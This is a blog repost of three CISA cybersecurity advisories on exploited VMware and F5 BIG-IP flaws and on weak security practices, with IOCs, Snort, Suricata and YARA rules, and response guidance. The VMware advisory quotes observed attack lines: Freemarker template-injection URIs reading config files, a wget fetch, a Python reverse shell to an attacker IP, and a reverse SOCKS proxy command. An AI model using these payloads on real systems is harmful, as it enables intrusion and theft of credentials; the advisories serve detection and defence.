Technology Blog

August 15, 2022

AA22-138B: Threat Actors Chaining Unpatched VMware Vulnerabilities for Full System Control

Original release date: May 18, 2022 | Last revised: June 2, 2022

Summary

Update June 2, 2022:

This Cybersecurity Advisory (CSA) has been updated with additional indicators of compromise (IOCs) and detection signatures, as well as tactics, techniques, and procedures (TTPs) from trusted third parties. 

Update End

The Cybersecurity and Infrastructure Security Agency (CISA) is releasing this CSA to warn organizations that malicious cyber actors, likely advanced persistent threat (APT) actors, are exploiting CVE-2022-22954 and CVE-2022-22960 separately and in combination. These vulnerabilities affect certain versions of VMware Workspace ONE Access, VMware Identity Manager (vIDM), VMware vRealize Automation (vRA), VMware Cloud Foundation, and vRealize Suite Lifecycle Manager. Exploiting these vulnerabilities permits malicious actors to trigger a server-side template injection that may result in remote code execution (RCE) (CVE-2022-22954) or escalation of privileges to root (CVE-2022-22960). 

VMware released updates for both vulnerabilities on April 6, 2022, and, according to a trusted third party, malicious cyber actors were able to reverse engineer the updates to develop an exploit within 48 hours and quickly began exploiting the disclosed vulnerabilities in unpatched devices. CISA was made aware of this exploit a week later and added CVE-2022-22954 and CVE-2022-22960 to its catalog of Known Exploited Vulnerabilities on April 14 and April 15, respectively. In accordance with Binding Operational Directive (BOD) 22-01, Reducing the Significant Risk of Known Exploited Vulnerabilities, federal agencies were required to apply updates for CVE-2022-22954 and CVE-2022-22960 by May 5, and May 6, 2022, respectively

Note: based on this activity, CISA expects malicious cyber actors to quickly develop a capability to exploit newly released vulnerabilities CVE-2022-22972 and CVE-2022-22973 in the same impacted VMware products. In response, CISA has released, Emergency Directive (ED) 22-03 Mitigate VMware Vulnerabilities, which requires emergency action from Federal Civilian Executive Branch agencies to either immediately implement the updates in VMware Security Advisory VMSA-2022-0014 or remove the affected software from their network until the updates can be applied.

CISA has deployed an incident response team to a large organization where the threat actors exploited CVE-2022-22954. Additionally, CISA has received information—including IOCs—about observed exploitation at multiple other large organizations from trusted third parties.

This CSA provides IOCs and detection signatures from CISA as well as from trusted third parties to assist administrators with detecting and responding to this activity. 

Update June 2, 2022:

This CSA also provides TTPs of this activity from trusted third parties to assist administrators with detecting and responding to this activity. 

Update End

Due to the rapid exploitation of these vulnerabilities, CISA strongly encourages all organizations with internet-facing affected systems—that did not immediately apply updates—to assume compromise and initiate threat hunting activities using the detection methods provided in this CSA. If potential compromise is detected, administrators should apply the incident response recommendations included in this CSA.

Download the PDF version of this report (pdf, 349kb).

For a downloadable copy of IOCs, see AA22-138B.stix

Technical Details

CISA has deployed an incident response team to a large organization where the threat actors exploited CVE-2022-22954. Additionally, CISA has received information about observed exploitation of CVE-2022-22954 and CVE-2022-22960 by multiple threat actors at multiple other large organizations from trusted third parties.

  • CVE-2022-22954 enables an actor with network access to trigger a server-side template injection that may result in RCE. This vulnerability affects the following products:[1]
    • VMware Workspace ONE Access, versions 21.08.0.1, 21.08.0.0, 20.10.0.1, 20.10.0.0
    • vIDM versions 3.3.6, 3.3.5, 3.3.4, 3.3.3
    • VMware Cloud Foundation, 4.x
    • vRealize Suite LifeCycle Manager, 8.x
  • CVE-2022-22960 enables a malicious actor with local access to escalate privileges to root due to improper permissions in support scripts. This vulnerability affects the following products:[2]
    • VMware Workspace ONE Access, versions 21.08.0.1, 21.08.0.0, 20.10.0.1, 20.10.0.0
    • vIDM, versions 3.3.6, 3.3.5, 3.3.4, 3.3.3
    • vRA, version 7.6 
    • VMware Cloud Foundation, 3.x, 4.x, 
    • vRealize Suite LifeCycle Manager, 8.x

According to trusted third-party reporting, threat actors may chain these vulnerabilities. At one compromised organization, on or around April 12, 2022, an unauthenticated actor with network access to the web interface leveraged CVE-2022-22954 to execute an arbitrary shell command as a VMware user. The actor then exploited CVE-2022-22960 to escalate the user’s privileges to root. With root access, the actor could wipe logs, escalate permissions, and move laterally to other systems. 

Update June 2, 2022:

For more information about this compromised organization, see the Victim 1 section.

Update End

Threat actors have dropped post-exploitation tools, including the Dingo J-spy webshell, a publicly available webshell that includes command execution, a file manager, a database manager, and a port scanner. During incident response activities, CISA observed, on or around April 13, 2022, threat actors leveraging CVE-2022-22954 to drop the Dingo J-spy webshell. Around the same period, a trusted third party observed threat actors leveraging CVE-2022-22954 to drop the Dingo J-spy webshell at one other organization. According to the third party, the actors may have also dropped the Dingo J-spy webshell at a third organization. Note: analysis of the first compromise and associated malware is ongoing, and CISA will update information about this case as we learn more.

Update June 2, 2022:

The following sections include additional information, including IOCs and TTPs, from trusted third parties about two confirmed compromises. See the appendix for TTPs in this CSA mapped to the MITRE ATT&CK for Enterprise framework.

Victim 1 

The trusted third party assesses that multiple threat actors (referred to as Threat Actor 1 [TA1] and Threat Actor 2 [TA2]) gained access to a public-facing server running VMWare Workspace ONE Access. TA1 downloaded a malicious shell script, which they used to collect and exfiltrate sensitive data. TA2 interacted with the server (without automation or scripts) and installed multiple webshells and a reverse secure socket (SOCKS) proxy.

Threat Actor 1

On April 12, TA1 exploited CVE 2022-22954 [T1203] to download [T1105] a malicious shell script [T1059] from https://20.232.97[.]189/up/80b6ae2cea.sh

TA1 first targeted Freemarker—a legitimate application that allows for customized notifications by creating templates—to send the following customized GET request URI to the compromised server [T1071.001]:

GET /catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7B%22freemarker.template.utility.Execute%22%3Fnew%28%29%28%22cat%20/usr/local/horizon/conf/system-config.properties%22%29%7DHTTP/1.1

The GET request resulted in the server downloading the malicious shell script, 80b6ae2cea[.]sh, to VMware Workspace ONE Access directory /usr/local/horizon/scripts/. TA1 then chained CVE 2022-22960 to the initial exploit to run the shell script with root privileges ([T1068], [TA0004]). The script was executed with the SUDO command.

The script, which contained VMware Workspace ONE Access directory paths and file locations, was developed for data exfiltration [TA0010]. The malicious script collected [TA0009] sensitive files–including user names, passwords, master keys, and firewall rules–and stored them in a “tar ball” (a “tar ball” is a compressed and zipped file used by threat actors for collection and exfiltration) [T1560]. The tar ball was located in a VMWare Workspace ONE Access directory: /opt/vmware/horizon/workspace/webapps/SAAS/horizon/images/.

The malicious script then deleted evidence of compromise [TA0005] by modifying logs to their original state and deleting files [T1070]. TA1 deleted many files and logs, including fd86ald0.pem,  localhost_access logs, logs associated with the VMWare Horizon application, and greenbox logs for the date of activity (April 12).  

Note: CISA received a similar malicious Bash script for analysis from a trusted third party at a different known compromise. See Victim 2 section for more information.

On April 12, TA1 also downloaded jtest.jsp, a JSP webshell, to the server’s web directory /SAAS/Horizon/js-lib/ from IP address 186.233.187[.]245.

TA1 returned to the server on April 12 to collect sensitive data stored in the “tar ball” by GET request.

Threat Actor 2

On April 13 and 14, TA2 sent many GET requests to the server exploiting—or attempting to exploit—CVE 2022-22954 to obtain RCE, upload binaries, and upload webshells [T1505.003] for persistence [TA0003].

  • On April 13, TA2 attempted to download a webshell app.jsp (MD5 4cd8366345ad4068feca4d417738b4bd) from IP address 51.79.171[.]53. app.jsp is a publicly available [T1588.001] webshell known as Godzilla.
  • On April 13, TA2 downloaded a JSP webshell (MD 5 F8FF5C72E8FFA2112B01802113148BD1) from http://84.38.133[.]149/img/icon1.gif.
  • On April 13, TA2 sent thousands of Unix commands [T1059.004] from IP address 84.38.133[.]149, some of which enabled TA2 to view /etc/passwd and /etc/shadow password files ([TA0006], [T1003.008]). The Unix commands included whoami, id, and cat.

The trusted third party found two copies of the Dingo J-spy webshell (MD5 5b0bfda04a1e0d8dcb02556dc4e56e6a) in web directories: horizon_all.jsp was in the /opt/vmware/horizon/workspace/webapps/SAAS/horizon/portal/ web directory and jquery.jsp was in the /webapps/cas/static/ directory. The third party was unable to determine how and when the webshells were created. TA2 used POST requests to communicate with the Dingo J-spy webshells. The commands and output were encrypted with an XOR key [T1573.001].

On April 14, TA2 downloaded a reverse SOCKS proxy [T1090]. TA2 first sent a GET request with the CHMOD command to change the permissions of .tmp12865xax, a hidden file in the /tmp directory [T1222.002]. The actor then downloaded a binary (MD5  dc88c5fe715b5f706f9fb92547da948a) from https://github[.]com/kost/revsocks/releases/download/v1.1.0/revsocks_linux_amd64. The binary is a reverse socks5 tunneling binary with TLS/SSL support and connects to https://149.248.35[.]200.sslip.io.

Additional Threat Actor Activity

The trusted third party observed additional threat actor activity that does not seem to be related to TA1 or TA2. On 13 April, IP address 172.94.89[.]112 attempted to connect a reverse shell on the compromised server to IP Address 100.14.239[.]83 on port 5410. The threat actor used the following command:

freemarker.template.utility.Execute"?new()("/usr/bin/python3.7 -c  \'importsocket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s. connect((\"100[.]14[.]239[.]83\",5410));os.dup2(s.fileno(),0);  os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\"/usr/bin/sh\",\"- i\"]);\'")}  

Victim 2 

CISA received a related malicious Bash script for analysis from a trusted third party. The analyzed script, deployed on or around April 12, exploits CVE 2022-22960 and allows a Horizon user to escalate privileges and execute commands and scripts as a superuser (sudo). The Bash script also allows the user to collect network information and additional information.

The script overwrites the publishCaCert.hzn script on fd86ald0.pem file and executes commands that compress a list of files containing information such as network interface configuration, list of users, passwords, masterkeys, hosts, and domains to a TAR archive. The TAR archive, located in a VMWare Workspace ONE Access directory, /opt/vmware/horizon/workspace/webapps/SAAS/horizon/images/, is assigned read and write permissions to the Horizon web user and read to all users.  

The malicious script deletes evidence of compromise by overwriting publishCaCert.hzn with fd86ald0.pem and then removing fd86ald0.pem.

The trusted third party observed the following IPs downloading, executing, and checking the bash script.

  • 45.72.112[.]245
  • 115.167.53[.]141
  • 191.102.179[.]197
  • 209.127.110[.]126
  • 45.72.85[.]172
  • 192.241.67[.]12

The trusted third party observed the following additional malicious IPs:

  • 20.232.97[.]189 – used for command for control [TA0011]
  • 194.31.98[.]141 – attempted to download MoneroOcean miner from Github
  • 8.45.41[.]114 – ran cat on a number of files in /usr/local/horizon/conf
  • 85.203.36[.]66 – attempted to pull down a JSP webshell from http://84.38.133[.]149/img/icon.gif

Update End

Detection Methods

Signatures

Note: servers vulnerable to CVE-2022-22954 may use Hypertext Transfer Protocol Secure (HTTPS) to encrypt client/server communications. Secure Sockets Layer (SSL)/Transport Layer Security (TLS) decryption can be used as a workaround for network-based detection and threat hunting efforts.

The following CISA-created Snort signature may detect malicious network traffic related to exploitation of CVE-2022-22954:

alert tcp any any -> any $HTTP_PORTS (msg:"VMware:HTTP GET URI contains '/catalog-portal/ui/oauth/verify?error=&deviceUdid=':CVE-2022-22954"; sid:1; rev:1; flow:established,to_server; content: "GET"; http_method; content:"/catalog-portal/ui/oauth/verify?error=&deviceUdid="; http_uri; reference:cve,2022-22954; reference:url,github.com/sherlocksecurity/VMware-CVE-2022-22954;

reference:url,github.com/tunelko/CVE-2022-22954-PoC/blob/main/CVE-2022-22954.py; priority:2; metadata:service http;)

The following third-party Snort signature may detect exploitation of VMware Workspace ONE Access server-side template injection:

10000001alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"Workspace One Serverside Template Injection";content:"GET"; http_method; content:"freemarker.template.utility.Execute";nocase; http_uri; priority:1; sid:;rev:1;)

Update June 2, 2022:

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"Workspace One Serverside  Template Injection";content:"GET"; http_method;  content:"freemarker.template.utility.Execute";nocase; http_uri; priority:1; sid:100000001;rev:1;)  

Update End

The following third-party YARA rule may detect unmodified instances of the Dingo J-spy webshell on infected hosts:

rule dingo_jspy_webshell
{
strings:
$string1 = "dingo.length"
$string2 = "command = command.trim"
$string3 = "commandAction"
$string4 = "PortScan"
$string5 = "InetAddress.getLocalHost"
$string6 = "DatabaseManager"
$string7 = "ExecuteCommand"
$string8 = "var command = form.command.value"
$string9 = "dingody.iteye.com"
$string10 = "J-Spy ver"
$string11 = "no permission ,die"
$string12 = "int iPort = Integer.parseInt"
condition:
filesize < 50KB and 12 of ($string*)
}

Note: the Dingo J-spy webshell is an example of post-exploitation tools that actors have used. Administrators should examine their network for any sign of post-exploitation activity.

Update June 2, 2022:

The following third-party YARA rule may detect unmodified instances of the Godzilla webshell on infected hosts:

rule Godzilla_Webshell  
{   
 strings:  
 $string1 = "TomcatListenerMemShellFromThread"  
 $string2 = "String xc ="  
 $string3 = "String pass ="  
 $string4 = "ServletRequestListener"  
 $string5 = "cmds = new String"  
 $string6 = "cmd"  
 $string7 = "bin/bash"  
 $string8 = "getInputStream"  
 $string9 = "javax.crypto.Cipher c = javax.crypto.Cipher.getInstance"  
 $string10 = "godzilla"  
 condition:  
 filesize < 20KB and 10 of ($string*)  

The following third-party YARA rule may detect unmodified instances of the TomCat JSP webshell on infected hosts:

rule Tomcatjsp_Webshell  
{  
 strings:  
 $string1 = "ExecShellCmd"  
 $string2 = "stCommParams"  
 $string3 = "nKeyOffset = EncryptData"  
 $string4 = "InputStream is = process.getInputStream"  
 $string5 = "Process process = Runtime.getRuntime"  
 $string6 = "ExecBinary"  
 $string7 = "byte bzKey"  
 $string8 = "nKeyOffset++"  
 $string9 = "HttpServletRequest request, HttpServletResponse response"   $string10 = "connect_test cmd"  
 $string11 = "exec cmd"  
 $string12 = "file upload"  
 condition:  
 filesize < 25KB and 12 of ($string*)  

 

The following third-party YARA rule may detect unmodified instances of the reverse SOCKS proxy on infected hosts.

rule reversesocks_tool  
{  
 md5 = "dc88c5fe715b5f706f9fb92547da948a"   strings:  
 $string1 = "revsocks"  
 $string2 = "-connect"  
 $string3 = "client:8080 -pass test"  
 $string4 = "RSA TESTING KEY"  
 $string5 = "SETTINGS_MAX_CONCURRENT_STREAMS"   $string6 = "Start on the server:"  
 $string7 = "closing connection"  
 $string8 = "socks 127.0.0.1:1080"  
 $string9 = "revsocks -listen :8080"  
 condition:  
 uint16(0) == 0x457F and filesize < 6MB and 8 of ($string*)  } 

Update End

Behavioral Analysis and Indicators of Compromise

Administrators should conduct behavioral analysis on root accounts of vulnerable systems by: 

  • Using the indicators listed in table 1 to detect potential malicious activity.
  • Reviewing systems logs and gaps in logs.
  • Reviewing abnormal connections to other assets.
  • Searching the command-line history.
  • Auditing running processes.
  • Reviewing local user accounts and groups.  
  • Auditing active listening ports and connections.

Table 1: Third-party IOCs for Exploitation of CVE-2022-22954 and CVE-2022-22960 
Used around April 12–14, 2022 (Updated June 2, 2022)
 

IP Addresses
Indicator Comment
136.243.75[.]136  On or around April 12, 2022, malicious cyber actors may have used this German-registered IP address to conduct the activity. However, the actors may have used the Privax HMA VPN client to conduct operations. 
Update June 2, 2022:
84.38.133[.]149 A threat actor used this IP for command and control.
186.233.187[.]245 This IP attempted to upload webshells.  The user agent string for this IP was Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 
212.227.198[.]95  
20.232.97[.]189 A threat actor used this IP for command and control (see Victim 1 and Victim 2 sections). 
160.20.145[.]225  
149.248.35[.]200  
100.14.239[.]83 A threat actor attempted to connect a reverse shell on the compromised server to this IP address.
51.79.171[.]53 This IP address attempted to upload a webshell
172.94.89[.]112 This IP address attempted to have a reverse shell on the compromised server to connect back to IP Address 100.14.239[.]83 on port 5410.
83.84.74[.]155   
194.31.98[.]141 This IP attempted to download MoneroOcean miner from Github.
8.45.41[.]114 This IP ran cat on a number of files in /usr/local/horizon/conf.
85.203.36[.]66  This IP attempted to pull down a JSP webshell from http://84.38.133[.]149/img/icon.gif.
45.72.112[.]245 These IPs downloaded, executed, and checked a malicious bash script.
115.167.53[.]141
191.102.179[.]197
209.127.110[.]126
45.72.85[.]172
192.241.67[.]12
Domains
https://149.248.35[.]200.sslip[.]io  
sslip[.]io    
https://github[.]com/kost/revsocks/releases/download  
Update End
Scanning, Exploitation Strings, and Commands Observed
catalog-portal/ui/oauth/verify    

catalog 

portal/ui/oauth/verify?error=&deviceUdid=${"freemarker.template.utility.Execute"?new()("cat  /etc/hosts")} 

 

/catalog 

portal/ui/oauth/verify?error=&deviceUdid=${"freemarker.template.utility.Execute"?new()("wget  -U "Hello 1.0" -qO - http://[REDACTED]/one")} 

 
freemarker.template.utility.Execute

Search for this function in: 

/opt/vmware/horizon/workspace/logs/greenbox_web.log

Update June 2, 2022:

or /opt/vmware/horizon/workspace/logs/greenbox_web.log*

freemarker.template.utility.Execute may be legitimate but could also indicate malicious shell commands. You should URL decode the logs before searching for freemarker.template.utility.Execute.

  Update End
/opt/vmware/certproxy/bing/certproxyService.sh  Check for this command being placed into the script; CVE-2022-22960 allows a user to write to it and be executed as root.
/horizon/scripts/exportCustomGroupUsers.sh  Check for this command being placed into the script; CVE-2022-22960 allows a user to write to it and be executed as root.
/horizon/scripts/extractUserIdFromDatabase.sh   Check for this command being placed into the script; CVE-2022-22960 allows a user to write to it and be executed as root.
Update June 2, 2022:
.tmp12865xax2 -connect 149[.]248[.]35[.]200.sslip[.]io:443 -pass  OneTwoOne123!" (Bash)  
Update End  
Files

horizon.jsp  

June 2, 2022 Update:

(jquery.jsp)

5b0bfda04a1e0d8dcb02556dc4e56e6a (MD 5)

Update End

Found in /usr/local/horizon/workspace/webapps/SAAS/horizon/js-lib: 
Update June 2, 2022:
jest.jsp  
74805fa847acac6adc896968421ec9e (MD 5)  
dc88c5fe715b5f706f9fb92547da948a (MD 5) Reverse SOCKS proxy
Update End
Webshells

jspy  

Update June 2, 2022:

C509282c94b504129ac6ef168a3f08a8 (MD 5)

Update End

 

godzilla 

Update June 2, 2022:

app.jsp 

4cd8366345ad4068feca4d417738b4bd (MD 5)

Update End

 
tomcatjsp    

 

Update May 25, 2022: see Palo Alto Networks Unit 42 Threat Brief: VMware Vulnerabilities Exploited in the Wild (CVE-2022-22954 and Others) for additional IOCs to detect possible exploitation or compromise. Note: due to the urgency to share this information, CISA has not yet validated this content.

Incident Response

If administrators discover system compromise, CISA recommends they:

  1. Immediately isolate affected systems. 
  2. Collect and review relevant logs, data, and artifacts.
  3. Consider soliciting support from a third-party incident response organization to provide subject matter expertise, ensure the actor is eradicated from the network, and avoid residual issues that could enable follow-on exploitation.
  4. Report incidents to CISA via CISA’s 24/7 Operations Center ([email protected] or 888-282-0870).

Mitigations

CISA recommends organizations update impacted VMware products to the latest version or remove impacted versions from organizational networks. CISA does not endorse alternative mitigation options. As noted in ED 22-03 Mitigate VMware Vulnerabilities, CISA expects malicious cyber actors to quickly develop a capability to exploit newly released vulnerabilities CVE-2022-22972 and CVE-2022-22973 in the same impacted VMware products. ED 22-03 directs all Federal Civilian Executive Branch agencies to enumerate all instances of impacted VMware products and deploy updates in VMware Security Advisory VMSA-2022-0014 or to remove the affected software from the agency network until the updates can be applied.

Resources

Contact Information 

CISA encourages recipients of this CSA to report incidents to CISA via CISA’s 24/7 Operations Center ([email protected] or 888-282-0870)

References

[1] VMware Security Advisory VMSA-2022-0011
[2] Ibid

Update June 2, 2022:

Appendix: Mitre  Att&ck TTPS

Threat actors and their malware have used the TTPs in table 1 when exploiting CVE-2022-22954 and/or CVE-2022-22960 and conducting related activity. See the ATT&CK for Enterprise framework for all referenced threat actor tactics and techniques.

Table 2: MITRE ATT&CK TTPs

Tactic  Technique
Resource Development [TA0042] Obtain Capabilities: Malware [T1588.001]
Execution [TA0002] Command and Scripting Interpreter [T1059]
Command and Scripting Interpreter: Unix Shell [T1059.004
Exploitation for Client Execution  [T1203]
Persistence  [TA0003] Server Software Component: Web Shell  [T1505.003
Privilege Escalation [TA0004] Exploitation for Privilege Escalation [T1068]
Defense Evasion [TA0005

File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification

[T1222.002]

Indicator Removal on Host [T1070]

Credential Access [TA0006]
  • OS Credential Dumping: /etc/passwd and /etc/shadow
  • [T1003.008]
Collection [TA0009]

Archive Collected Data [T1560]

Command and Control [TA0011] Application Layer Protocol: Web Protocols [T1071.001]
Encrypted Channel: Symmetric Cryptography  [T1573.001]
Proxy [T1090]
Ingress Tool Transfer [T1105]
Exfiltration [TA0004]  

Update End

References

Revisions

  • Initial Version: May 18, 2022
  • May 25, 2022: Added Industry Resource
  • June 2, 2022: Added Detection Signatures, IOCs, and TTPs

This product is provided subject to this Notification and this Privacy & Use policy.

August 15, 2022

AA22-138A: Threat Actors Exploiting F5 BIG-IP CVE-2022-1388

Original release date: May 18, 2022

Summary

Actions for administrators to take today:
• Do not expose management interfaces to the internet.
• Enforce multi-factor authentication.
• Consider using CISA’s Cyber Hygiene Services.

The Cybersecurity and Infrastructure Security Agency (CISA) and the Multi-State Information Sharing & Analysis Center (MS-ISAC) are releasing this joint Cybersecurity Advisory (CSA) in response to active exploitation of CVE-2022-1388. This recently disclosed vulnerability in certain versions of F5 Networks, Inc., (F5) BIG-IP enables an unauthenticated actor to gain control of affected systems via the management port or self-IP addresses. F5 released a patch for CVE-2022-1388 on May 4, 2022, and proof of concept (POC) exploits have since been publicly released, enabling less sophisticated actors to exploit the vulnerability. Due to previous exploitation of F5 BIG-IP vulnerabilities, CISA and MS-ISAC assess unpatched F5 BIG-IP devices are an attractive target; organizations that have not applied the patch are vulnerable to actors taking control of their systems.

According to public reporting, there is active exploitation of this vulnerability, and CISA and MS-ISAC expect to see widespread exploitation of unpatched F5 BIG-IP devices (mostly with publicly exposed management ports or self IPs) in both government and private sector networks. CISA and MS-ISAC strongly urge users and administrators to remain aware of the ramifications of exploitation and use the recommendations in this CSA—including upgrading their software to fixed versions—to help secure their organization’s systems against malicious cyber operations. Additionally, CISA and MS-ISAC strongly encourage administrators to deploy the signatures included in this CSA to help determine whether their systems have been compromised. CISA and MS-ISAC especially encourage organizations who did not patch immediately or whose F5 BIG-IP device management interface has been exposed to the internet to assume compromise and hunt for malicious activity using the detection signatures in this CSA. If potential compromise is detected, organizations should apply the incident response recommendations included in this CSA.

Download the PDF version of this report (pdf, 500kb).

Technical Details

CVE-2022-1388 is a critical iControl REST authentication bypass vulnerability affecting the following versions of F5 BIG-IP:[1]

  • 16.1.x versions prior to 16.1.2.2 
  • 15.1.x versions prior to 15.1.5.1 
  • 14.1.x versions prior to 14.1.4.6 
  • 13.1.x versions prior to 13.1.5 
  • All 12.1.x and 11.6.x versions

An unauthenticated actor with network access to the BIG-IP system through the management port or self IP addresses could exploit the vulnerability to execute arbitrary system commands, create or delete files, or disable services. F5 released a patch for CVE-2022-1388 for all affected versions—except 12.1.x and 11.6.x versions—on May 4, 2022 (12.1.x and 11.6.x versions are end of life [EOL], and F5 has stated they will not release patches).[2]

POC exploits for this vulnerability have been publicly released, and on May 11, 2022, CISA added this vulnerability its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. Due to the POCs and ease of exploitation, CISA and MS-ISAC expect to see widespread exploitation of unpatched F5 BIG-IP devices in government and private networks. 

Dection Methods

CISA recommends administrators, especially of organizations who did not immediately patch, to:

  • See the F5 Security Advisory K23605346 for indicators of compromise. 
  • See the F5 guidance K11438344 if you suspect a compromise. 
  • Deploy the following CISA-created Snort signature:
alert tcp any any -> any $HTTP_PORTS (msg:”BIG-IP F5 iControl:HTTP POST URI ‘/mgmt./tm/util/bash’ and content data ‘command’ and ‘utilCmdArgs’:CVE-2022-1388”; sid:1; rev:1; flow:established,to_server; flowbits:isnotset,bigip20221388.tagged; content:”POST”; http_method; content:”/mgmt/tm/util/bash”; http_uri; content:”command”; http_client_body; content:”utilCmdArgs”; http_client_body; flowbits:set,bigip20221388.tagged; tag:session,10,packets; reference:cve-2022-1388; reference:url,github.com/alt3kx/CVE-2022-1388_PoC; priority:2; metadata:service http;)

Additional resources to detect possible exploitation or compromise are identified below:

  • Emerging Threats suricata signatures. Note: CISA and MS-ISAC have verified these signatures are successful in detection of both inbound exploitation attempts (SID: 2036546) as well as post exploitation, indicating code execution (SID: 2036547).
    • SID 2036546
alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"ET EXPLOIT F5 BIG-IP iControl REST Authentication Bypass (CVE 2022-1388) M1"; flow:established,to_server; content:"POST"; http_method; content:"/mgmt/tm/util/bash"; http_uri; fast_pattern; content:"Authorization|3a 20|Basic YWRtaW46"; http_header; content:"command"; http_client_body; content:"run"; http_client_body; distance:0; content:"utilCmdArgs"; http_client_body; distance:0; http_connection; content:"x-F5-Auth-Token"; nocase; http_header_names; content:!"Referer"; content:"X-F5-Auth-Token"; flowbits:set,ET.F5AuthBypass; reference:cve,2022-1388; classtype:trojan-activity; sid:2036546; rev:2; metadata:attack_target Web_Server, created_at 2022_05_09, deployment Perimeter, deployment SSLDecrypt, former_category EXPLOIT, performance_impact Low, signature_severity Major, updated_at 2022_05_09;
  • SID SID 2036547
alert http $HOME_NET any -> any any (msg:"ET EXPLOIT F5 BIG-IP iControl REST Authentication Bypass Server Response (CVE 2022-1388)"; flow:established,to_client; flowbits:isset,ET.F5AuthBypass; content:"200"; http_stat_code; file_data; content:"kind"; content:"tm|3a|util|3a|bash|3a|runstate"; fast_pattern; distance:0; content:"command"; distance:0; content:"run"; distance:0; content:"utilCmdArgs"; distance:0; content:"commandResult"; distance:0; reference:cve,2022-1388; classtype:trojan-activity; sid:2036547; rev:1; metadata:attack_target Web_Server, created_at 2022_05_09, deployment Perimeter, deployment SSLDecrypt, former_category EXPLOIT, performance_impact Low, signature_severity Major, updated_at 2022_05_09;)

 

Incident Response 

If an organization’s IT security personnel discover system compromise, CISA and MS-ISAC recommend they:

  1. Quarantine or take offline potentially affected hosts.
  2. Reimage compromised hosts.
  3. Provision new account credentials.
  4. Limit access to the management interface to the fullest extent possible.
  5. Collect and review artifacts such as running processes/services, unusual authentications, and recent network connections.
  6. Report the compromise to CISA via CISA’s 24/7 Operations Center ([email protected] or 888-282-0870). State, local, tribal, or territorial government entities can also report to MS-ISAC ([email protected] or 866-787-4722).

See the joint CSA from the cybersecurity authorities of Australia, Canada, New Zealand, the United Kingdom, and the United States on Technical Approaches to Uncovering and Remediating Malicious Activity for additional guidance on hunting or investigating a network, and for common mistakes in incident handling. CISA and MS-ISAC also encourage government network administrators to see CISA’s Federal Government Cybersecurity Incident and Vulnerability Response Playbooks. Although tailored to federal civilian branch agencies, these playbooks provide operational procedures for planning and conducting cybersecurity incident and vulnerability response activities and detail steps for both incident and vulnerability response. 

Mitigations

CISA and MS-ISAC recommend organizations:

  • Upgrade F5 BIG-IP software to fixed versions; organizations using versions 12.1.x and 11.6.x should upgrade to supported versions. 
  • If unable to immediately patch, implement F5’s temporary workarounds:
    • Block iControl REST access through the self IP address.
    • Block iControl REST access through the management interface.
    • Modify the BIG-IP httpd configuration. 

See F5 Security Advisory K23605346 for more information on how to implement the above workarounds. 

CISA and MS-ISAC also recommend organizations apply the following best practices to reduce risk of compromise:

  • Maintain and test an incident response plan.
  • Ensure your organization has a vulnerability program in place and that it prioritizes patch management and vulnerability scanning. Note: CISA’s Cyber Hygiene Services (CyHy) are free to all SLTT organizations and public and private sector critical infrastructure organizations: https://www.cisa.gov/cyber-hygiene-services.
  • Properly configure and secure internet-facing network devices.
    • Do not expose management interfaces to the internet.
    • Disable unused or unnecessary network ports and protocols.
    • Disable/remove unused network services and devices.
  • Adopt zero-trust principles and architecture, including:
    • Micro-segmenting networks and functions to limit or block lateral movements.
    • Enforcing multifactor authentication (MFA) for all users and VPN connections.
    • Restricting access to trusted devices and users on the networks.

References

Revisions

  • Initial Version: May 18, 2022

This product is provided subject to this Notification and this Privacy & Use policy.

August 15, 2022

AA22-137A: Weak Security Controls and Practices Routinely Exploited for Initial Access

Original release date: May 17, 2022

Summary

Best Practices to Protect Your Systems:
• Control access.
• Harden Credentials.
• Establish centralized log management.
• Use antivirus solutions.
• Employ detection tools.
• Operate services exposed on internet-accessible hosts with secure configurations.
• Keep software updated.

Cyber actors routinely exploit poor security configurations (either misconfigured or left unsecured), weak controls, and other poor cyber hygiene practices to gain initial access or as part of other tactics to compromise a victim’s system. This joint Cybersecurity Advisory identifies commonly exploited controls and practices and includes best practices to mitigate the issues. This advisory was coauthored by the cybersecurity authorities of the United States,[1],[2],[3] Canada,[4] New Zealand,[5],[6] the Netherlands,[7] and the United Kingdom.[8]

Download the PDF version of this report (pdf, 430kb).

Technical Details

Malicious actors commonly use the following techniques to gain initial access to victim networks.[TA0001]

Malicious cyber actors often exploit the following common weak security controls, poor configurations, and poor security practices to employ the initial access techniques.

  • Multifactor authentication (MFA) is not enforced. MFA, particularly for remote desktop access, can help prevent account takeovers. With Remote Desktop Protocol (RDP) as one of the most common infection vector for ransomware, MFA is a critical tool in mitigating malicious cyber activity. Do not exclude any user, particularly adminstrators, from an MFA requirement. 
  • Incorrectly applied privileges or permissions and errors within access control lists. These mistakes can prevent the enforcement of access control rules and could allow unauthorized users or system processes to be granted access to objects. 
  • Software is not up to date. Unpatched software may allow an attacker to exploit publicly known vulnerabilities to gain access to sensitive information, launch a denial-of-service attack, or take control of a system. This is one of the most commonly found poor security practices.
  • Use of vendor-supplied default configurations or default login usernames and passwords. Many software and hardware products come “out of the box” with overly permissive factory-default configurations intended to make the products user-friendly and reduce the troubleshooting time for customer service. However, leaving these factory default configurations enabled after installation may provide avenues for an attacker to exploit. Network devices are also often pre-configured with default administrator usernames and passwords to simplify setup. These default credentials are not secure—they may be physically labeled on the device or even readily available on the internet. Leaving these credentials unchanged creates opportunities for malicious activity, including gaining unauthorized access to information and installing malicious software. Network defenders should also be aware that the same considerations apply for extra software options, which may come with preconfigured default settings.
  • Remote services, such as a virtual private network (VPN), lack sufficient controls to prevent unauthorized access. During recent years, malicious threat actors have been observed targeting remote services. Network defenders can reduce the risk of remote service compromise by adding access control mechanisms, such as enforcing MFA, implementing a boundary firewall in front of a VPN, and leveraging intrusion detection system/intrusion prevention system sensors to detect anomalous network activity.  
  • Strong password policies are not implemented. Malicious cyber actors can use a myriad of methods to exploit weak, leaked, or compromised passwords and gain unauthorized access to a victim system. Malicious cyber actors have used this technique in various nefarious acts and prominently in attacks targeting RDP. 
